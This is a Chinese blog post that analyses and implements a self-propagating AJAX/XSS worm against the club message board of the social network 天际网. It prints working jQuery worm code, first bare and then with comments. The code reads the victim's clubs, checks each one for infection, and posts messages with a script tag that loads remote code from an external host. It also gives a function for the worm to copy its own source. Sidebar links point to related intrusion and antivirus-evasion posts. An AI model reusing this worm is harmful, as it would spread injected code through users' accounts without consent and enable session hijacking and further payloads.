天际网ajax worm分析及实现

最新推荐文章于 2024-08-08 18:09:29 发布
最新推荐文章于 2024-08-08 18:09:29 发布
阅读量445 收藏
点赞数
分类专栏: 黑软 文章标签: ajax url 框架 javascript firefox html
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zhdd1234/article/details/4433143
版权
最近心血来潮想研究下ajax worm的传播,偶然发现了天际网的几处xss漏洞,其中一处为俱乐部处留言的地方没过滤好导致xss攻击。就写个ajax worm来玩玩了。

分析:
由于没有对script标记做很好的限制,使ajax worm的应用起来相对就容易的多了。
字符限制为1000,可以直接写源码进页面了。
刚开始用xmlhttp来获取数据和提交数据,不知道怎么回事,在IE下调试能用,在firefox下调试不起作用了。
后来发现天际网采用了一个叫做jquery的轻量级的javascript框架,于是直接调用框架中的ajax函数。
发现一个好处,采用系统自带框架的ajax函数,可以使ajax worm代码更短。

写了个简单的应用,一共10行,代码如下:
Quote:
var indexhtml = $.ajax({url: "/Group/Index",async:false}).responseText;
var urllist = indexhtml.substring(indexhtml.indexOf("<blockquote>")+12,indexhtml.indexOf("</blockquote>")).match(/groupId=/d+/g);
if (urllist!=null){
for(i=0;i<urllist.length;i++){
var html = $.ajax({url: "/Group/GroupIndex?"+urllist ,async: false}).responseText;
if(html.indexOf("http://localhost/2.js")==-1) {
$.ajax({type: "POST",url: "/Group/BBSDone?"+urllist,data:"content=元旦快乐!<script type='text/javascript' src='http://localhost/2.js'></script>&inIndex=true&"+urllist});
}
}
}


源码分析如下:
Quote:
//获取俱乐部主页源码
var indexhtml = $.ajax({url: "/Group/Index",async:false}).responseText;
//获取要感染的俱乐部IDlist
var urllist = indexhtml.substring(indexhtml.indexOf("<blockquote>")+12,indexhtml.indexOf("</blockquote>")).match(/groupId=/d+/g);
//如果当前用户加入的有俱乐部,则感染,没有则退出执行
if (urllist!=null){
//循环感染
for(i=0;i<urllist.length;i++){
//获取要感染俱乐部页面源码
var html = $.ajax({url: "/Group/GroupIndex?"+urllist ,async: false}).responseText;
//判断是否已经感染,没感染则感染
if(html.indexOf("http://localhost/2.js")==-1) {
//感染
$.ajax({type: "POST",url: "/Group/BBSDone?"+urllist,data:"content=2008元旦快乐!<script type='text/javascript' src='http://localhost/2.js'></script>&inIndex=true&"+urllist});
}
}
}


一个获取ajax worm蠕虫本身源码的函数,使用当前页面自己感染的时候或许有用。
Quote:
function codes(){
var urlstr = document.location.href;
var code = $.ajax({url: urlstr,async: false}).responseText;
code = code.substring(code.indexOf("<!--code start-->"),code.lastIndexOf("<!--//code end-->"));
return code;
}
brock
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
H-WORM家族远控木马分析与处置
不忘初心,护天下安全!
08-15 2753
首先通过读取注册表项+脚本名,判断当前系统是否已感染,接着将目标文件放入注册表项"HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\"和"HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\"中实现自启动。H-WORM作者ID为Houdini,使用VBS编写以实现远控蠕虫功能,能够通过感染U盘传播,出现的时间最早可以追溯到2013年7月。...
社团结构的划分及实现过程
打印/传真嵌入式开发--张志龙的专栏
02-21 2704
从Barabasi在1999年首次发表关于无标度络的论文后,对复杂络的研究引起许多研究工作者的关注。复杂络存在于人类现实社会中,存在于虚拟空间中,形态各异,复杂多变,但在统计意义上呈现很多相似的属性。在这些复杂络中,存在一些内部链接紧密,外部链接稀疏的节点,这些节点组成的络结构称为络社团结构。在络科学中对社团的定义,主要从以下几点假设出发:1) 络的社团结构仅由其连接模式决定。2)社团是络中局部紧密连接的子图。
计算机必背单词——络和安全
热门推荐
少说,多做。
06-26 1万+
这些都是我认为程序员需要掌握的单词,就算有些英文你不熟悉,但是对应的中文至少了解什么意思。看完这个系列,希望你第一能认识更多单词,第二是拓宽自己的知识面,哪个概念不懂就自己去主动了解。计算机络和安全是计算机学科中的两个非常关键的领域。以下是与这些领域相关的词汇。
一例Phorpiex僵尸络样本分析
好好学习,天天向上
07-02 1477
本文主要分析Phorpiex僵尸络的一个变种,该样本通常NSIS打包,能够检测虚拟机和沙箱。病毒本体伪装为一个文件夹,通过U盘来传播,会隐藏系统中各盘符根目录下的文件夹,创建同名的lnk文件,诱导用户点击。
【SeedLab】Morris Worm Attack Lab
cold_windx的博客
08-19 3382
本节实验准备了两个环境,internet-nano与internet-mini,我们将在较小的实验环境internet-nano中实现worm程序,最后迁移至internet-mini的大环境中测试。由于docker在一次启动过多container时存在bug,在启动internet-mini时使用内置的z_start.sh启动(实际就是分批启动)。
百度XSS Worm 分析
Killua
03-30 1669
1.expressioncss expression(css表达式)可以在CSS中定义表达式(公式)来达到建立元素间属性之间的联系等作用,从IE5开始支持,最后因为标准、性能、安全性等问题,微软从IE8 beta2 开始取消对 CSS expression的支持。也就是说可以在css代码后面插入一段js代码,css的属性值为其后的js代码计算出来的值。这样就带来了安全隐患,可以在css中插入恶意j...
什么是 WORM(一次写入,多次读取)?
最新发布
diveintokernel的专栏
08-08 771
基于磁盘的WORM基于磁盘的WORM技术,是数据安全领域的一次革命性飞跃。它巧妙地融合了磁盘存储硬件与先进的软件解决方案,后者具备一项独特的能力:一旦数据被写入,软件便通过激活数据不可变性标志,确保这些信息坚如磐石,无法被篡改或覆盖。这种创新的锁定机制,为数据的完整性提供了坚不可摧的保障。光盘基础的WORM基于光盘的WORM,以其一次性写入的特性,为数据的长期保存提供了一种经济高效的途径。利用DVD-R或蓝光光盘这样的光盘介质,WORM技术能够将数据永久封存,成为数据归档和长期保留的理想选择。
蠕虫病毒分析方法
weixin_46564680的博客
02-19 2949
蠕虫分析方法1. 蠕虫病毒是什么2.蠕虫病毒的行为特点2.1 蠕虫传播2.2 蠕虫的络行为特征3.分析案例 1. 蠕虫病毒是什么 蠕虫是通过络主动复制自己传播的程序 蠕虫传播途径 邮件蠕虫–Loveletter,在OUTlook或foxmail中找到联系人,将恶意程序发给联系人,让所有的联系人都收到这样的邮件; 即时通漏洞–MSN/Worm.MM,通过QQ、微信传播的蠕虫病毒,通过即时消息发送; 操作系统或应用络漏洞–CodeRed,Nimda,往往很难发现 2.蠕虫病毒的行为特点 2.1 蠕虫传
络安全】OSSIM平台络日志关联分析实战
HBohan的博客
04-25 5090
一、络安全管理中面临的挑战 目前很多组织都已经拥有了防火墙、入侵检测、防病毒系统、管软件,但是络管理者在安全追根溯源及安全管理面临如下挑战: 1 .安全设备和络应用产生的安全事件数量巨大,误报严重。一台IDS系统一天产生的安全事件数量近成千上万。通常99%的安全事件都是误报。真正有威胁的安全事件淹没于海量信息中难于识别。 安全事件之间存在的横向和纵向方面(如不同空间来源、时间序列等)的关系未能得到综合分析,因此漏报严重,不能实现实时预测。一个攻击活动之后常常接着另一个攻击活动,前一个攻击活动为后
worm-scraper:将络连续剧《蠕虫》及其续集《病房》(Ward)刮成电子书格式
05-10
npm install -g worm-scraper 从互联上下载该程序及其依赖项将需要一些时间。 完成后,尝试通过键入以下内容来运行它: worm-scraper --help 如果输出了一些帮助文档,则安装过程将顺利进行。 您可以通过键入...
sql_programming_code_developed_worm.rar_The Worm_WORM
09-24
标题中的"sql_programming_code_developed_worm.rar_The_Worm_WORM"指的是一个关于SQL编程开发的蠕虫病毒的代码压缩包。这个压缩包包含了一个名为"The Worm_WORM"的经典蠕虫代码实例,其核心是利用SQL编程语言进行...
Morris_worm.zip_WORM
09-21
【Morris Worm.zip_WORM】是一个与络安全历史密切相关的压缩包,其中包含了著名的“莫里斯蠕虫”(Morris Worm)的源代码。这个蠕虫是互联历史上第一次大规模的络攻击事件,对当时的互联产生了深远影响。 ...
bat.worm.muma.rar_WORM
09-20
在压缩包内的两个文件,"pudn.txt"和"bat.worm.muma.txt"可能是关于这个蠕虫病毒的详细分析报告或者是解剖样本。"pudn.txt"可能包含了对蠕虫病毒的命名、特征、行为、传播方式等信息的介绍。而"bat.worm.muma.txt"很...
定位免杀NOD32的一些经验
zhdd1234的专栏
10-08 4738
----collect dying site:http://www.idying.cn欢迎大家一起讨论先说下定位方法:1  NOD32不能正向定位的,定位出来也是不能修改的!针对nod32应该选择反向定位,开始位置为400填充不一定是90 可以使任意的 现在填90有时候被干扰的2 使用排除法收集下目前免杀过NOD32的方法源码:1源码免杀的另类方法函数的延迟加载例:
139端口入侵简易教程
zhdd1234的专栏
09-27 2926
 一篇老文章了  net use //192.168.0.1/ipc$Content$nbsp;"" /user:administrator  提到139端口,我想知道的人一定非常多,本来是不想用写这个教程的,但考虑要照顾到新人,所以还是简单的写一下。  首先,连接的命令是:  netuse//IP地址/ipc$Content$lt;空格>密码/user:用户名  假设我要连接
资深程序员深度解密:福彩黑客案
zhdd1234的专栏
07-18 2745
我是一个程序设计者,以多年开发程序的经验,对深圳福彩中心黑客案进行一下分析:  1、疑犯算不上黑客,起码算不上高明的黑客  黑客侵入一台计算机并且安装了木马,就意味着对这台计算机拥有了控制权,(通常将这样的计算机称为肉鸡)。只要不暴露,黑客对肉鸡的控制可以一直持续到这台计算机重装操作系统。黑客,其实就是一些别有用心的程序高手。他们的主要作案工具就是“程序”。而程序一个最大的特点,就是可以无
制作图片木马教程
zhdd1234的专栏
09-15 2249
 何谓BMP页木马?它和过去早就用臭了的MIME头漏洞的木马不同,MIME木马是把一个EXE文件用MIME编码为一个EML(OUT LOOK信件)文件,放到页上利用IE和OE的编码漏洞实现自动下载和执行。  然而BMP木马就不同,它把一个EXE文件伪装成一个BMP图片文件,欺骗IE自动下载,再利用页中的JAVASCRIPT脚本查找客户端的Internet临时文件夹,找到下载后的BMP文件
各个端口的入侵总结 (1)
zhdd1234的专栏
08-08 1397
 21端口是默认的FTP端口,利用方式:弱口令探测/溢出  目前我还没看到远程溢出的,SERU的本地溢出漏洞风靡一时,曾经很多服务器就在沦丧于这个漏洞。  这个端口可以参照上的教程,就不多说了,下面的TELNET也是一样,扫描到了弱口令直接登陆上去。  22端口  22端口是SSH远程登录协议,利用方式:弱口令探测  23端口  23端口是TLENET的默认端口,利用方式
举例实现一下WORM
06-01
下面是一个简单的实现 WORM 的示例: ```python class WORM: def __init__(self): self.data = None self.is_written = False def write(self, data): if not self.is_written: self.data = data self.is_...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值